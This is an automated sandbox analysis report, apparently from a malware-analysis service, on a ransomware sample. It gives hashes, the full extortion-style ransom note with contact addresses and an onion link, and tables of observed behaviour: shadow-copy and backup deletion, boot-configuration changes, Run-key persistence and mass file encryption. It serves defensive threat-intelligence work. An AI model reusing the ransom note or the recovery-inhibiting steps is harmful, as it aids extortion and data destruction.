ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106

Analysis

max time kernel
152s
max time network
137s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-02-2024 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
Size

333KB
MD5

e2132d123382278c9646ae2ebbe3b3a7
SHA1

f2b257bb84b29ba0c73faf854e39470ace9801a7
SHA256

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106
SHA512

c703eb197ae7abcd3f1cd53d82f832de24e4263dfdc018bb573f895d1d507585d0944225d9ad510e8abbb757ffd8beba1d74084a3ffd2afd40dc2d550080991a
SSDEEP

6144:3kvY9W2QcboLKCwSuo0/WdjEXCNVDLNU3mxcK3PnXvBHkyEXq:3kw9XbCwSuo0/EEXCNJprX1kyEXq

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

C:\MSOCache\All Users\How_to_back_files.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">51uEjINpvTs22gSSlpljltHBo1qbd0mDW1/uO+hCOFeAOkjQD/EB5rhTZCY8CWz2La0UgYqFsz0D+4jPWvzmjIuzTruXAr93dUSq3mJts2J857yF3cANZtRy33Av7chK/btT1DtlCXoSgEjmMuR6uWcCr1DqaZh2Hz8uY/NobwIcAWDQGQQeQtAaAy4cYvO7DzFkUukjV75eXHYZ1mY5RCAMckNAajNiaNYeK7c3dI9z+U4G1lKlzvDpz5uPfPr3ZnMqnREzC14xkTOZlYWJbMiu6t1LtZ15jJ8FRWpmwbXwhzDFwuSrg+dkA/UMtLDRHNPkDAuc6c+or3lB3hPpXZjFtGdUDSjBWoXPv6F5ucrYSQqhHj8N7khtFAu1aZadXN4CaaDYFRjCVdAothGtvHU+ghvqsAnJq/PZ+QzPFzuTEEMImYxi+e21vsY0v0hXwsG/PAvgQkITn2CgMuRfT+eBrCk1X9jjwlLWtUGeVQt7zu0Ed7ceJLUIlSujCRct0day7Zes3nc1EAAX7HAeAdzb75SY0iIWuh+aWym4MiFN/CMTrmh8LQtGGTUPei8UNjyImWdLKXy0TnRnuq6UoYUce814M4SOL7ZR9JTx0eS0EqnHGuSg3Rl42iqGbBuUYs+cyPBHPLwNtPLlS7HxHfxFWogFgby+i4/YdXek7UILY1nnJae/6uzYdl43eeFLkfUc5x1EaUbFCXeErq+iom0r7Qm1uVPwpCiE0YYZ1xBjXdR64PE/z8f/qDH5UP18JQeycM8VRKfCGs+Hgwdy1Fd9AQyFns1eekfAlG9cOVUdMx5ZZc8MdxaemWRMvvOms6q20yoywY1OMYxnlcNth8cF6OAOR+4P3Pa/I+0gD4LxWM4retJctBvZYIQQWqFCgTeRPZwTlOPtItwth49SkBe6ODFROkGmJ/isTR/F+57JvEHWQWi/4qPCaP5iX0blvHT//0cl2pau/D3xvsgGtv5fkalIGSI0Z7WRO9sndvG3u+/qIjkBYjQm5asVXdeD+3vpiMnMWOwF0aoySvEQHNGoOW1O+8hU2+pZZw0S9gSCtpJq5hY95UQSQ5+a5JR4gBRbT95FD2m8pri+Lr/0WRkk+HG475Q+miFLnz89PZQgXked3FLYga/umcaFny3wgEi171XJZqZY2TlJYq609q7Mb+1w9GLYArlPNzJuI0fWsaBSkiYBk1JgbMK5TrwU6a8MNARC/hnAem8o6FrszyB/z18w/yV6+Hf/+yBr89bBRzr/JMFbomY5jXTvzJAGuP22gH21C8O+FX/ancLd/Yd5a4CgqBpf/vIgg7P/YvohnwZaEZRL5Szibe7koymml3MVYxLDTEY72UcFM/PVZvKGgx9sovJIFX5L60tOelyJ3bks2cRdhAK+z67ZZpy9rGPNCsWiOVdWoxyDGjXydRUQNCz40SFm6LUDoYCoBjD/3hy0GNDZTW/LUDCeVadbldQtrqK2LOpBivaNm8oNuF57FyvP3s1c/TmSf9pDDVKsBOKOlDKWq1zVAVayxO/fdY4+dv9pfpyky65RwFj5z/zfBYGpgniwKtYGzEzeC2+OKjEy0L8evgZWGnkze/+VEtUSySbVnmi9xWdP6RLOzzCxjAGoi6/IzmrLBIDLA3Jko5j0UkwE0oLiIW1OzmyVTzSxYsFGoIKB2g2VL5gvUrjUzPKsukxDh9S/fnPAtuQ=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> <p>* Tor-chat to always be in touch: <a href<a href<b> </div> </div> </div>  <b> <b> <b> <span style="font-size: 22px">qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</span> </b><br><br> </b><br>  </div> </div>  </div> </div> </body> </html>

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

description pid process target process

PID 2996 created 1396 2996 ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2572 bcdedit.exe
2660 bcdedit.exe
Renames multiple (3887) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2648 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1720 wbadmin.exe

description	pid	process	target process
PID 2996 created 1396	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	Explorer.EXE

pid	process
2572	bcdedit.exe
2660	bcdedit.exe

pid	process
2648	wbadmin.exe

pid	process
1720	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.execa4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe\""	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe\""	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

description	ioc	process
File opened (read-only)	\??\A:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\G:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\H:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\I:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\K:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\N:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\S:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\F:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\L:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\R:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\T:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\W:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\B:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\E:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\J:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\M:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\U:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\V:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\O:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\P:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\Q:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\X:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\Y:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened (read-only)	\??\Z:	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

Drops file in Program Files directory 64 IoCs

Processes:

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Monterrey	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\mip.exe.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\IPSEventLogMsg.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Seyes.emf	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECLIPSE\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\VGX\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103812.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Internet Explorer\en-US\networkinspection.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\IpsMigrationPlugin.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106208.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Common Files\System\ado\it-IT\msader15.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\msdaprsr.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\th.pak	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Updater6\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\Common Files\System\ado\it-IT\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Media Player\de-DE\WMPMediaSharing.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BREEZE\PREVIEW.GIF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proofing.en-us\SETUP.XML	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\SIGNUP\install.ins	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\README.txt	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Brussels	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gd\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files (x86)\Internet Explorer\SIGNUP\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Media Player\es-ES\WMPDMCCore.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\settings.js	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\js\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105410.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File created	C:\Program Files\Java\jdk1.7.0_80\How_to_back_files.html	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2516 vssadmin.exe

pid	process
2516	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2000	taskkill.exe
2252	taskkill.exe
3036	taskkill.exe
2400	taskkill.exe
1720	taskkill.exe
2336	taskkill.exe
2708	taskkill.exe
2160	taskkill.exe
1516	taskkill.exe
2936	taskkill.exe
2320	taskkill.exe
2976	taskkill.exe
2744	taskkill.exe
1012	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

pid	process
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe
2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	2708	taskkill.exe
Token: SeDebugPrivilege	2744	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	2160	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	2976	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2444	WMIC.exe
Token: SeSecurityPrivilege	2444	WMIC.exe
Token: SeTakeOwnershipPrivilege	2444	WMIC.exe
Token: SeLoadDriverPrivilege	2444	WMIC.exe
Token: SeSystemProfilePrivilege	2444	WMIC.exe
Token: SeSystemtimePrivilege	2444	WMIC.exe
Token: SeProfSingleProcessPrivilege	2444	WMIC.exe
Token: SeIncBasePriorityPrivilege	2444	WMIC.exe
Token: SeCreatePagefilePrivilege	2444	WMIC.exe
Token: SeBackupPrivilege	2444	WMIC.exe
Token: SeRestorePrivilege	2444	WMIC.exe
Token: SeShutdownPrivilege	2444	WMIC.exe
Token: SeDebugPrivilege	2444	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2444	WMIC.exe
Token: SeRemoteShutdownPrivilege	2444	WMIC.exe
Token: SeUndockPrivilege	2444	WMIC.exe
Token: SeManageVolumePrivilege	2444	WMIC.exe
Token: 33	2444	WMIC.exe
Token: 34	2444	WMIC.exe
Token: 35	2444	WMIC.exe
Token: SeBackupPrivilege	2724	vssvc.exe
Token: SeRestorePrivilege	2724	vssvc.exe
Token: SeAuditPrivilege	2724	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2996 wrote to memory of 2632	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
PID 2996 wrote to memory of 2632	2996	ca4bed0330558829a5b642a63ea28bceb62def74b6a3e309460eea4e185da106.exe	cmd.exe
